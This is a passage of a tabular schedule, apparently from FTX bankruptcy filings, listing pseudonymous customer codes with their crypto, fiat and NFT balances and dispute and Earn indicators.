| 07422605 | | SOL[0], USD[0.00] | | |
| 07422606 | | BAT[2.09908836], BRZ[5.07952967], CUSDT[20], DAI[.00002344], DOGE[4.87493745], GRT[8.5426738], SOL[0], TRX[11.53967813], USD[0.95], USDT[2.66417198] | Yes | |
| 07422608 | | CUSDT[2], DOGE[2258.77306039], SHIB[4393515.91034688], USD[365.35] | Yes | |
| 07422609 | | BTC[.00000421], DOGE[.404], USD[0.25] | | |
| 07422611 | | BTC[.00016663], DOGE[170.28409687], USD[0.00] | | |
| 07422616 | | BRZ[3], BTC[.01435067], CUSDT[15], DOGE[5671.68228508], ETH[.45945288], ETHW[.45925572], LTC[2.0739122], SHIB[1], SOL[17.34771064], TRX[6], USD[1690.06], USDT[1.08762845] | Yes | |
| 07422617 | | ETH[.03883997], ETHW[.01816737], SHIB[1], USD[0.00] | | |
| 07422622 | | BTC[.00049898], DOGE[1], ETH[.00530312], ETHW[.00530312], USD[0.00] | | |
| 07422631 | | BTC[.00001609], USD[0.00] | | |
| 07422646 | | BAT[2.01262417], BRZ[2], CUSDT[4], DOGE[3], SHIB[8], TRX[3], USD[6737.51], USDT[2.09615747] | Yes | |
| 07422659 | | DOGE[1], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07422661 | | BTC[.00167531], CUSDT[1], USD[0.00] | Yes | |
| 07422663 | | USD[0.00] | | |
| 07422665 | | USD[30.00] | | |
| 07422668 | | BTC[0.00000001], NFT (559556833653483855/FTX - Off The Grid Miami #1614)[1], USD[1.92], USDT[0.00000001] | | |
| 07422671 | | CUSDT[1], USD[0.00] | | |
| 07422672 | | ETH[0], SOL[0], USD[0.00] | | |
| 07422676 | | DOGE[93.91622281], USD[0.00] | | |
| 07422681 | | BAT[1], BRZ[1], DOGE[5], ETH[.00002222], ETHW[3.63521555], GRT[1], LINK[.02460106], SHIB[1], SUSHI[1.0036299], TRX[1], USD[0.00], USDT[1.08774754] | Yes | |
| 07422696 | | GRT[114.03073872] | | |
| 07422705 | | BRZ[1], CUSDT[4], DOGE[5], ETH[1.00496684], ETHW[1.00496684], LINK[22.77391543], TRX[1], USD[0.00] | | |
| 07422720 | | ETH[.15498173], ETHW[.15498173], USD[0.00], USDT[0] | | |
| 07422721 | | DOGE[4064.68542783], USD[0.00] | | |
| 07422723 | | BAT[1], BRZ[2], CUSDT[4], DOGE[1], TRX[1], USD[0.62] | | |
| 07422735 | | USD[0.01] | Yes | |
| 07422741 | | BRZ[1], CUSDT[5], DOGE[1], USD[0.00] | Yes | |
| 07422743 | | CUSDT[7], DOGE[9.99996634], USD[0.00] | | |
| 07422746 | | BRZ[1], CUSDT[1], DOGE[475.90106444], USD[0.00] | | |
| 07422747 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07422752 | | CUSDT[474.57321972], DOGE[23.72210752], GRT[52.22422823], SHIB[911925.83844233], TRX[1], USD[17.30] | Yes | |
| 07422754 | Contingent, Disputed | DOGE[5.38358412], USD[0.52] | | |
| 07422761 | | BAT[1.0165555], CUSDT[1], DOGE[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07422762 | | BAT[1.0165555], BTC[0], DOGE[1], USD[0.00] | Yes | |
| 07422767 | | USDT[1.247036] | | |
| 07422772 | | BTC[.01272473] | | |
| 07422773 | | BAT[0], BCH[0], DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07422775 | | ETH[0] | | |
| 07422776 | | BRZ[1], BTC[.00000031], CUSDT[6], DOGE[5842.09450777], TRX[3], USD[0.21] | | |
| 07422783 | | BRZ[1], CUSDT[5], TRX[2], USD[0.01] | | |
| 07422787 | | USD[0.00], USDT[0] | Yes | |
| 07422791 | | BAT[3.28485049], BRZ[2], CUSDT[1], DOGE[3], SHIB[2], SOL[0], USD[0.01], USDT[2.21116845] | Yes | |
| 07422792 | | DOGE[1], USD[0.00] | | |
| 07422793 | | DOGE[1], ETH[0] | | |
| 07422796 | | BAT[10.83804149], BRZ[111.30671167], CUSDT[40], DAI[10.95161478], DOGE[25.75083748], GRT[10.86757814], LINK[.06208416], SOL[.01394912], SUSHI[2.01975113], TRX[342.53127035], UNI[2.19673862], USD[10.98], USDT[0.39928180] | | |
| 07422808 | | BAT[1.2], CUSDT[5], DAI[0], GRT[28.56398642], SHIB[4], TRX[2], USD[0.00] | | |
| 07422811 | | BCH[.00000012], CUSDT[4], TRX[2.00009395], USD[0.00], USDT[0] | | |
| 07422818 | | BTC[0] | | |
| 07422822 | | BRZ[1], CUSDT[3], GRT[1], TRX[4], USD[0.00], USDT[1] | | |
| 07422826 | | BRZ[8.65212693], CUSDT[20], ETH[1.43422865], ETHW[1.43362627], GRT[1], MATIC[374.88373366], SHIB[1], SUSHI[0], TRX[3], USD[0.01], USDT[0.45067326] | Yes | |
| 07422828 | | BTC[0], DOGE[0], ETH[0], GRT[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07422832 | | NFT (30128754218025714S/GSW Western Conference Semifinals Commemorative Ticket #407)[1], NFT (31841723297387046/GSW Western Conference Finals Commemorative Banner #800)[1], NFT (33650382564050593/GSW 75 Anniversary Diamond  #91 (Redeemed))[1], NFT (35214083065833825/GSW Round 1 Commemorative Ticket #242)[1], NFT (35911814856895804/GSW Western Conference Finals Commemorative Banner #798)[1], NFT (38827053911653909/Sollama)[1], NFT (42824325949328310/GSW Championship Commemorative Ring)[1], NFT (47208422584461338/GSW Western Conference Finals Commemorative Banner #799)[1], NFT (50008474977865786/GSW Western Conference Finals Commemorative Banner #797)[1], NFT (51337365962504479/Warriors Hoop #412 (Redeemed))[1], NFT (51654374620629652/Garrett, the Unusual)[1], NFT (52935039332047846/GSW Championship Commemorative Ring)[1], NFT (54516102207089482/GSW Western Conference Semifinals Commemorative Ticket #406)[1], SOL[.00000001, USD[28.79] | | |
| 07422833 | | CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07422837 | | BTC[0.01998397], SOL[3.09987295], USD[0.00] | | |
| 07422839 | | USD[0.00], USDT[21.24971069] | | |
| 07422840 | | CUSDT[2], USD[0.00] | | |
| 07422844 | | AAVE[0], BAT[0], BRZ[0], BTC[0.00000001], CUSDT[0], DOGE[0], ETH[0.00009274], ETHW[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], NFT (29653309463119981/Ape MAN#094)[1], NFT (32004594188106887/Saudi Arabia Ticket Stub #1651)[1], NFT (37149032492787825/3D CATPUNK #586)[1], NFT (40430963946787548/ALPHA.RONIN #785)[1], NFT (42885356239101329/3D CATPUNK #6241)[1], NFT (48139906881022442/3D CATPUNK #9149)[1], NFT (54356974725103802/2D SOLDIER #454)[1], NFT (56700317881171486/Barcelona Ticket Stub #367)[1], PAXG[0], SHIB[36.11136799], SOL[0.31111344], TRX[1], USD[1.82], YFI[0] | Yes | |
| 07422846 | | CUSDT[1], DOGE[2.00547018], TRX[1], USD[0.01] | | |
| 07422848 | | CUSDT[3], DOGE[2], USD[0.00], USDT[0] | | |
| 07422849 | | ETH[.0000023], ETHW[.0000023], USD[0.00] | Yes | |
| 07422850 | | BTC[0], ETH[0], SOL[0, USD[0.00], USDT[0.00004329] | | |
| 07422852 | | USD[2.18] | | |
| 07422857 | | BTC[.00212605], CUSDT[1], DOGE[24619.606121], TRX[1], USD[100.00], USDT[1] | | |
| 07422858 | | KSHIB[.58730104], MATIC[0], SHIB[730909.41620053], USD[0.00] | Yes | |
| 07422862 | | DOGE[1], TRX[362.00287502], USD[0.00] | | |
| 07422863 | | USD[0.01] | | |
| 07422868 | | BTC[0], CUSDT[2], DOGE[0], TRX[1], USD[0.00] | | |
| 07422872 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07422875 | | LINK[.00279084] | Yes | |
| 07422885 | | CUSDT[2], DOGE[10.23950147], USD[0.07] | | |
| 07422888 | | ETHW[.00038198], USD[0.00] | | |
| 07422892 | | ETH[0], SOL[0.00000001] | | |
| 07422893 | | BTC[.00002943], CUSDT[6], DOGE[.22760126], ETH[0.00102999], ETHW[0.00101631], USD[-0.22], YFI[.00015528] | Yes | |
| 07422894 | | DOGE[71.928], LINK[.064], SOL[.00836821], USD[0.00], USDT[9.61772650] | | |
| 07422898 | | CUSDT[5], DOGE[.01310781], USD[22.09] | Yes | |
| 07422900 | | USD[0.01] | | |
| 07422905 | | BTC[.00115734], CUSDT[2351.30883058], DOGE[3], ETH[.02634107], ETHW[.02634107], TRX[1318.82531421], USD[8.78] | | |
| 07422908 | | USD[0.15] | Yes | |
| 07422911 | | CUSDT[2], DOGE[2286.21518394], USD[0.00] | | |
| 07422913 | | SHIB[248.66800966], USD[0.00] | | |
| 07422914 | | USD[0.24], USDT[0.73141899] | | |
| 07422920 | | USDT[0] | | |
| 07422923 | | BTC[.00248309], CUSDT[1935.32120029], DAI[61.634556], DOGE[606.92867217], ETH[.04214023], ETHW[.04214023], LINK[1.02546529], MATIC[30.11518651], SHIB[2477558.78151882], SOL[2.28527912], TRX[1592.7047807], USD[10.00], USDT[50.71557498] | | |
| 07422926 | | USD[41.45] | | |
| 07422929 | | BRZ[1], DOGE[.0000235], USD[0.00] | Yes | |
| 07422932 | | USD[0.00] | | |
| 07422933 | Contingent, Disputed | USD[0.00] | | |
| 07422937 | | USD[0.01] | | |
| 07422942 | | BRZ[1], ETH[.09328371], ETHW[.09328371], USD[0.00] | | |
| 07422943 | | USD[0.01] | Yes | |
| 07422944 | | BAT[.00000006], LTC[.00000001], USD[0.00] | | |
| 07422945 | | CUSDT[3], DOGE[127.9312022], ETH[.00738365], ETHW[.00728782], USD[0.00] | Yes | |
| 07422947 | | BTC[.00071222], CUSDT[2], DOGE[17.99109296], SOL[1.01261558], TRX[1], USD[0.00] | | |
| 07422949 | | USD[0.00] | | |
| 07422953 | | BRZ[1], USD[0.01] | | |
| 07422956 | | BAT[0], DOGE[0], SOL[0], USD[0.00] | Yes | |
| 07422959 | | BRZ[1], CUSDT[1.11404684], DOGE[.00000428], TRX[2.00016956], USD[0.00], USDT[1] | | |
| 07422966 | | BTC[0], DOGE[1] | | |
| 07422969 | | DOGE[1], GBP[39.38], USD[0.00] | Yes | |
| 07422970 | | BRZ[1], CUSDT[3], DOGE[1], ETHW[.20179263], TRX[5], USD[0.00] | | |
| 07422971 | Contingent, Unliquidated | USD[7268.97] | | |
| 07422979 | | BTC[.00176888], LINK 20834638], SUSHI[.47521593], USD[1380.02] | | |
| 07422988 | | DOGE[181.68836654], USD[0.00] | Yes | |
| 07422990 | | BTC[.00002568], SOL[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07422991 | | ETH[.00080499], ETHW[.00080499], SOL[0.22344215], USD[1.11] | | |
| 07422994 | | USD[9.71] | | |
| 07423002 | | BTC[.01628561], CUSDT[12], DOGE[1833.878793], ETH[.13032253], ETHW[.12925697], TRX[1], USD[0.00] | Yes | |
| 07423006 | | BRZ[1], CUSDT[23], TRX[6], USD[0.00] | Yes | |
| 07423007 | | CUSDT[11], DOGE[1], SHIB[2343237.48503959], USD[1.39] | Yes | |
| 07423010 | | UNI[.29771517], USD[0.00] | | |
| 07423012 | | CUSDT[1], DOGE[2], TRX[2], USD[0.00], USDT[0] | | |
| 07423014 | Contingent, Disputed | BTC[0], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07423016 | | USD[0.01], USDT[0] | | |
| 07423019 | | BRZ[1], CUSDT[1], DOGE[295.48561509], TRX[1], USD[0.01] | | |
| 07423020 | | CUSDT[1], DOGE[1], USD[2057.59] | | |
| 07423022 | | DOGE[0], TRX[.00002727], USD[0.74] | | |
| 07423024 | | BAT[2.07835021], BRZ[3], BTC[.00019423], CUSDT[14], DOGE[12271.74644081], ETH[.21724741], ETHW[.21702961], GRT[1], LINK[1.1049585], LTC[.13329364], MATIC[382.85958605], MKR[.00472536], SHIB[549896.7139805], SOL[6.58372664], SUSHI[10.53111881], TRX[7], UNI[1.1049585], USD[0.15], USDT[3.31487537] | Yes | |
| 07423026 | | BTC[20], SOL[0] | | |
| 07423030 | | MATIC[20.06601999], USD[0.00] | | |
| 07423036 | | BAT[0], USD[0.00] | | |
| 07423038 | | USD[0.00] | | |
| 07423042 | | DOGE[2], GRT[57.42884907], SUSHI[5.11808033], TRX[1], USD[0.00] | Yes | |
| 07423047 | | SOL[.002], USDT[.684906] | | |
| 07423049 | | CUSDT[1], DOGE[3.05180657], USD[0.00], USDT[0.00000008] | | |
| 07423051 | | BTC[.00014583], ETH[.00310151], ETHW[.00310151], USD[0.00] | | |
| 07423054 | | BTC[0.00005260], ETH[0], SOL[13.24680000], USD[1.23], USDT[2.0727] | | |
| 07423055 | | DOGE[0], USD[0.01], USDT[0] | Yes | |
| 07423060 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], LINK[0], TRX[0], USD[0.01] | | |
| 07423064 | | ETH[0], USD[0.00] | | |
| 07423065 | | BRZ[4], CUSDT[10], TRX[4], USD[0.00] | Yes | |
| 07423070 | | CUSDT[1], DOGE[30.25895797], USD[0.00] | | |
| 07423072 | | USD[42.69], USDT[0.00000001] | Yes | |
| 07423079 | | DOGE[1.15393598], TRX[1], USD[0.01] | | |
| 07423088 | | BTC[0.00009999], ETH[.000347], ETHW[.000347], USD[0.00], USDT[0] | | |
| 07423090 | | BTC[0], USD[2.98], USDT[0] | | |
| 07423092 | | BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], MATIC[0], SUSHI[0], TRX[0], USD[0.01], USDT[0], YFI[0] | Yes | |
| 07423104 | | CUSDT[1], DOGE[715.57920889], TRX[1], USD[0.00] | | |
| 07423106 | | BTC[.2], ETHW[.00094449], USD[2008.07] | | |
| 07423110 | | USD[0.00] | | |
| 07423113 | | BTC[.00002193], SOL[41.8558], USDT[2.0381245] | | |
| 07423117 | | BAT[1], BRZ[1], CUSDT[2], DOGE[.66142381], USD[802.65] | | |
| 07423118 | | BRZ[1], DOGE[2626.38310925], USD[0.00] | | |
| 07423124 | | BAT[1], BRZ[2], CUSDT[11], DOGE[1763.44130792], TRX[3], USD[35.12], USDT[1] | | |
| 07423127 | | BRZ[2], CUSDT[5], DOGE[8401.58569028], TRX[4], USD[0.00] | | |
| 07423129 | | ETH[.00070576], ETHW[0.00070576], NFT (439636613521390030/Coachella x FTX Weekend 1 #1744)[1], USD[10.00], USDT[0.00845397] | | |
| 07423130 | | USD[100.00] | | |
| 07423132 | | USD[0.00], USDT[0] | | |
| 07423133 | | ETH[.00441598], ETHW[.00441598], USD[0.00] | | |
| 07423134 | | USD[0.31] | | |
| 07423135 | | BAT[4.42314429], BRZ[3], CUSDT[12], DOGE[6.21020663], GRT[6.3759065], LTC[1.82187204], SOL[14.05852205], TRX[13.49092605], UNI[16.16881555], USD[0.01] | Yes | |
| 07423137 | | BTC[.00000278], CUSDT[1], USD[0.01], USDT[0] | Yes | |
| 07423138 | | CUSDT[1], DOGE[4], LTC[.00000425], USD[0.01] | | |
| 07423143 | | BTC[0.15056303], ETH[1.60333331], ETHW[1.60259655], GRT[0], KSHIB[0], LINK[0], MATIC[478.08573496], USD[0.00], USDT[0.00000001] | Yes | |
| 07423145 | | BTC[.00008146], CUSDT[1], USD[50.00] | | |
| 07423152 | | BTC[.00008311], DOGE[83.82790399], USD[0.00] | | |
| 07423158 | | NFT (372641281170510451/Coachella x FTX Weekend 2 #5754)[1] | | |
| 07423160 | | AAVE[0], BAT[4.3829748], BCH[0], BRZ[14.22512382], BTC[0], CUSDT[32], DOGE[7.29162167], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], TRX[11.13520514], UNI[0], USD[3.62], USDT[0] | Yes | |
| 07423169 | | CUSDT[1], DOGE[1], SOL[0] | | |
| 07423170 | | BTC[.00327914], ETH[.04444427], ETHW[0.04444426], USD[0.71], USDT[0.00019786] | | |
| 07423175 | | CUSDT[2], ETH[0], ETHW[0], USD[0.00], USDT[1.08671496] | Yes | |
| 07423185 | | BRZ[1], CUSDT[13], NFT (363672948051949806/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #41)[1], NFT (400307566314623044/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #30)[1], NFT (569672607653429249/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #40)[1], SHIB[1], TRX[277.46645097], USD[0.00], USDT[1.10899207] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07423189 | | BAT[.0079], BTC[0], GRT[.0027], SUSHI[.0014], TRX[.001], USD[0.00] | | |
| 07423198 | | ETHW[3.6110917], SHIB[1], USD[18.08], USDT[0] | Yes | |
| 07423199 | | BAT[1], DOGE[3], TRX[694.08310073], USD[0.00] | | |
| 07423202 | | USD[0.39] | | |
| 07423205 | | ETH[.00085611], ETHW[0.00085610], USD[39.50] | | |
| 07423209 | | BTC[0], ETH[0], ETHW[120.79549972], USD[0.00] | | |
| 07423224 | | DOGE[0], TRX[3], USD[0.00] | | |
| 07423225 | | SHIB[82.63814262], USD[0.00] | Yes | |
| 07423229 | | DOGE[2], USD[0.00] | | |
| 07423235 | | USD[0.01] | | |
| 07423236 | | BTC[0], CUSDT[2], ETH[0], SOL[1.25284593], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07423241 | | CUSDT[2], USD[0.01] | | |
| 07423243 | | ETH[.00260186], ETHW[.00260186], TRX[59.82397274], USD[0.00] | | |
| 07423247 | | DOGE[1233.72854934], NFT (341647754083623915/Saudi Arabia Ticket Stub #2002)[1], USD[0.00] | Yes | |
| 07423265 | | BTC[0.00003423], LINK[.058839], USD[0.07] | | |
| 07423278 | | CUSDT[1], DOGE[3], ETH[0], ETHW[0], TRX[2], USD[0.00], USDT[0], YFI[0] | | |
| 07423279 | | TRX[1], USD[0.00] | | |
| 07423280 | | CUSDT[2], USD[0.00] | | |
| 07423289 | | CUSDT[473.25033423], USD[0.00] | | |
| 07423300 | | CUSDT[1], DOGE[3], TRX[1], USD[0.00] | | |
| 07423305 | | USD[0.00], USDT[0] | | |
| 07423311 | | USD[0.00], USDT[0] | | |
| 07423315 | | NFT (288298124110599037/Reflector #210)[1], NFT (304146223637947233/Reflection '07 #41)[1], NFT (311202897033913296/Imola Ticket Stub #996)[1], NFT (410886706725728534/Spectra #484)[1], NFT (449084627481658694/Night Light #808)[1], NFT (453785504331803220/Cosmic Creations #869)[1], NFT (542589587686613786/Colossal Cacti #741)[1], NFT (557192261303520158/Beasts #608)[1], USD[0.00] | | |
| 07423316 | | NFT (324951424282927612/StarAtlas Anniversary)[1], NFT (348573614490123206/StarAtlas Anniversary)[1], NFT (361451678756602313/Imola Ticket Stub #1267)[1], NFT (390216333808001237/Australia Ticket Stub #2425)[1], NFT (400625111311443258/StarAtlas Anniversary)[1], NFT (449918520711737699/StarAtlas Anniversary)[1], NFT (474741997312409654/Saudi Arabia Ticket Stub #1443)[1], NFT (482394295785834965/StarAtlas Anniversary)[1], NFT (492678137857827123/StarAtlas Anniversary)[1], NFT (517596807916782100/StarAtlas Anniversary)[1], NFT (525526673786974162/Bahrain Ticket Stub #2421)[1], NFT (549884049231815909/StarAtlas Anniversary)[1], SOL[.044] | | |
| 07423332 | | DOGE[1], USD[0.00] | Yes | |
| 07423336 | | BAT[2.13233195], BRZ[2], CUSDT[1], DOGE[60558.71569791], TRX[1], USD[0.00], USDT[2.15367081] | Yes | |
| 07423338 | | ALGO[0], BTC[0], DOGE[0], USD[0.00] | Yes | |
| 07423340 | | DOGE[0], SHIB[714.66178667], USD[0.00] | Yes | |
| 07423343 | | BTC[.2955556], ETH[.000512], ETHW[.000512], LTC[7.94205], USD[0.79] | | |
| 07423345 | | TRX[.003885], USD[0.48], USDT[0] | | |
| 07423355 | | BRZ[1], CUSDT[2], DOGE[1506.96404851], USD[0.00] | Yes | |
| 07423362 | | KSHIB[600], SOL[10.15016], USD[0.76] | | |
| 07423365 | | BTC[.00134683], CUSDT[6], ETH[.00964933], ETHW[.00952621], SGD[20.80], SHIB[3], USD[54.58], USDT[0.00000001] | Yes | |
| 07423368 | | BTC[.00002916], DOGE[49.95], SUSHI[4.995], USD[0.86] | | |
| 07423373 | | CUSDT[1], ETH[0], TRX[1], USD[0.00] | | |
| 07423375 | | BTC[.00000013] | | |
| 07423376 | | USD[29.18] | | |
| 07423377 | | BTC[.00024814], DOGE[1], USD[0.00] | | |
| 07423379 | | BRZ[2], CUSDT[7], DOGE[15536.51406258], TRX[4], USD[0.00] | Yes | |
| 07423382 | | BTC[0], SOL[0], TRX[0], USD[0.26] | | |
| 07423385 | | ETH[.00000001] | | |
| 07423386 | | BAT[50.88332831], BRZ[1], BTC[.00859433], CUSDT[16], DOGE[23.97967871], ETH[.06450925], ETHW[.06450925], TRX[3], USD[0.00] | | |
| 07423388 | | BAT[1.0165555], CUSDT[6], DOGE[1], NFT (407776006236868446/Emma the Unicorn Fairy)[1], USD[06.11] | Yes | |
| 07423393 | | NFT (308116184144489364/Austria Ticket Stub #109)[1], NFT (398273224354388980/Barcelona Ticket Stub #582)[1], NFT (398538990983169212/Baku Ticket Stub #256)[1], NFT (419936801963573871/Silverstone Ticket Stub #94)[1], NFT (424909066435357727/Series 1: Wizards #392)[1], NFT (433229536789588137/Montreal Ticket Stub #37)[1], NFT (438006051816829063/Microphone #8949)[1], NFT (486744958672170333/Australia Ticket Stub #1259)[1], NFT (517646512747854104/Humpty Dumpty #788)[1], NFT (519539510350266344/FTX - Off The Grid Miami #553)[1], NFT (521807793435926813/FTX Crypto Cup 2022 Key #43)[1], NFT (524802328441083501/Series 1: Capitals #429)[1], NFT (544171700479633876/Entrance Voucher #1457)[1], USDT[.001] | Yes | |
| 07423397 | | DOGE[1984.032], USD[0.15] | | |
| 07423401 | | USD[200.00] | | |
| 07423410 | | USD[0.00], USDT[0] | | |
| 07423419 | | BTC[0.00000755], ETH[0], ETHW[0], SOL[.00847], USD[4.35] | | |
| 07423433 | | BTC[0], NFT (393543168432122948/Little Rocks #542)[1], USD[0.22] | | |
| 07423437 | | DOGE[.3581], GRT[.0215], SUSHI[0], TRX[.2653], USD[0.00], USDT[0.00000140] | | |
| 07423439 | | BAT[2.12557398], CUSDT[6], DOGE[0], GRT[1.00498957], TRX[2], USD[0.00] | Yes | |
| 07423440 | | DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07423441 | | BTC[0], USDT[.986762] | | |
| 07423446 | | CUSDT[2], MATIC[.00039664], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07423447 | | CUSDT[6], DAI[.00010903], GRT[1], TRX[4.77039843], USD[0.00] | Yes | |
| 07423451 | | BAT[3], CUSDT[5], DOGE[2], SHIB[1], TRX[2], USD[0.00], USDT[0] | | |
| 07423452 | | BAT[.00000289], BRZ[1], CUSDT[1], DOGE[1], LINK[.00000799], TRX[5], USD[0.00] | | |
| 07423453 | | BRZ[2], BTC[0], DOGE[7], ETH[0], TRX[2], USDT[1] | | |
| 07423454 | | CUSDT[1], USD[0.00] | | |
| 07423455 | | CUSDT[2], DOGE[314.07287696], TRX[348.82638757], USD[50.00] | | |
| 07423462 | | SUSHI[.00388785], TRX[657.78056634], USD[0.00] | | |
| 07423467 | | DOGE[23404.70159947], USD[0.00] | | |
| 07423468 | | AAVE[.002136], BTC[.0000531], ETH[.0009368], ETHW[.0009368], LINK[.03408], MATIC[4.29], SOL[.00517], TRX[.000001], USD[0.00], USDT[0] | | |
| 07423473 | | DOGE[0], ETH[0.00000001], GRT[.988], SHIB[100000], SOL[0.00000001], USD[4.58] | | |
| 07423480 | | ETH[.00076667], ETHW[0.00076666] | | |
| 07423484 | | BRZ[1], SOL[39.9] | | |
| 07423489 | | DOGE[1.00152001], USD[0.03] | Yes | |
| 07423490 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07423492 | | SHIB[1], USD[0.00] | Yes | |
| 07423495 | | CAD[0.82], CUSDT[2.14140989], DAI[.00645159], DOGE[377.21272644], GRT[17.99312279], TRX[.61297424], USD[0.36], USDT[11.21963050] | | |
| 07423498 | | BF_POINT[200], ETH[0], LTC[0], TRX[.32926101], USD[0.11] | Yes | |
| 07423500 | | BRZ[2], CUSDT[4], DOGE[1.08281383], SHIB[3], USD[0.00], USDT[0.00000001] | Yes | |
| 07423507 | | BRZ[1], BTC[0], CUSDT[1], DOGE[1], ETH[0], TRX[3], USD[0.00] | | |
| 07423512 | | BAT[1.00148048], CUSDT[3], DOGE[4], GRT[.00065596], SOL[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07423519 | | USD[0.00] | | |
| 07423523 | | BRZ[1], CUSDT[55.99690211], DOGE[.59227003], GRT[1.00367791], USD[0.00] | Yes | |
| 07423528 | | BTC[0.01511946], DOGE[1766.96565995], ETH[0.04482552], ETHW[0.04430103], LINK[11.76502326], LTC[.00006765], MATIC[86.96097771], NFT [326089222624737365/Entrance Voucher #4342][1], NFT [347725724827417388/APEFUEL by Almond Breeze #687][1], SHIB[3], SOL[11.11510359], SUSHI[14.5402464], TRX[11, UNI[8.98205015], USD[0.10], USDT[0] | Yes | |
| 07423535 | | BTC[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07423537 | | USD[0.03] | | |
| 07423538 | | BAT[4], BTC[.00219951], CUSDT[1], DOGE[3], ETH[.01946349], ETHW[.01946349], GRT[1], TRX[3], USD[0.01], USDT[0.00000010] | | |
| 07423552 | | USD[0.04], USDT[.001373] | | |
| 07423557 | | BRZ[1], CUSDT[1], ETHW[.62792839], SOL[.00068921], TRX[1], USD[0.00] | Yes | |
| 07423558 | | BRZ[1], CUSDT[1], DOGE[3], TRX[2], USD[0.00] | | |
| 07423560 | | AAVE[0], BTC[0], ETH[0], LINK[0], SOL[0], USD[0.00] | | |
| 07423562 | | BAT[17.20551909], DOGE[1] | Yes | |
| 07423563 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07423564 | | USD[0.00] | | |
| 07423568 | | DAI[0], USD[5.40] | | |
| 07423572 | | CUSDT[3], USD[0.00] | Yes | |
| 07423574 | | BTC[.00327878], DOGE[.752], ETH[.001795], ETHW[.001795], SOL[1.086], USD[392.26], YFI[.000996] | | |
| 07423576 | | SHIB[184825.31883637], USD[0.00], USDT[0] | | |
| 07423578 | | CUSDT[3], ETH[0], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07423579 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0.00000001], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[0], SOL[0.00000001], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07423583 | | ETH[.00011896], ETHW[.00081896], SOL[0.00000001], USD[170.14], USDT[0.00000024] | | |
| 07423585 | Contingent, Disputed | BTC[0], ETH[0], SOL[0], SUSHI[0], USD[0.57], USDT[0.00000001] | Yes | |
| 07423588 | | CUSDT[1], DOGE[1], USD[76.66] | | |
| 07423591 | | BTC[0], SOL[0], USD[0.00] | | |
| 07423595 | | BTC[0], SOL[0], TRX[.000005], USD[0.00], USDT[0.00000008] | | |
| 07423597 | | BAT[1], BRZ[1], CUSDT[15], DOGE[0], LTC[0], TRX[0], USD[0.01] | | |
| 07423606 | | USD[0.02] | | |
| 07423610 | | CUSDT[5], TRX[1], USD[0.87] | | |
| 07423619 | | CUSDT[1], DOGE[24.53987478], GRT[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07423626 | | CUSDT[1], DOGE[3], USD[0.00] | | |
| 07423632 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07423633 | | USD[0.01], USDT[0] | | |
| 07423637 | | USDT[0.33199004] | | |
| 07423639 | | SOL[0], USD[0.00] | | |
| 07423641 | | BRZ[1], CUSDT[7], DOGE[50.37834733], TRX[1], USD[0.01] | | |
| 07423645 | | AVAX[.02676658], BTC[0], ETHW[.00009248], LINK[.03442617], MATIC[3.17228937], MKR[.0005], SOL[.00374383], TRX[.001503], USD[118.70], USDT[0.00845200], WBTC[.00005752] | | |
| 07423646 | | BRZ[1], DOGE[3368.31383388], USD[0.00] | | |
| 07423656 | | BTC[0], DOGE[0], ETH[0.77264824], ETHW[0.77264824], SOL[0], USD[0.00] | | |
| 07423675 | | BTC[0], DAI[0], PAXG[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07423682 | | BRZ[6], BTC[.00543425], CUSDT[20], DOGE[23219.94340079], ETH[.19765243], ETHW[.19765243], TRX[6], USD[3.75] | | |
| 07423691 | | USD[0.25] | | |
| 07423698 | | USD[200.01] | | |
| 07423701 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07423704 | | USD[0.01] | | |
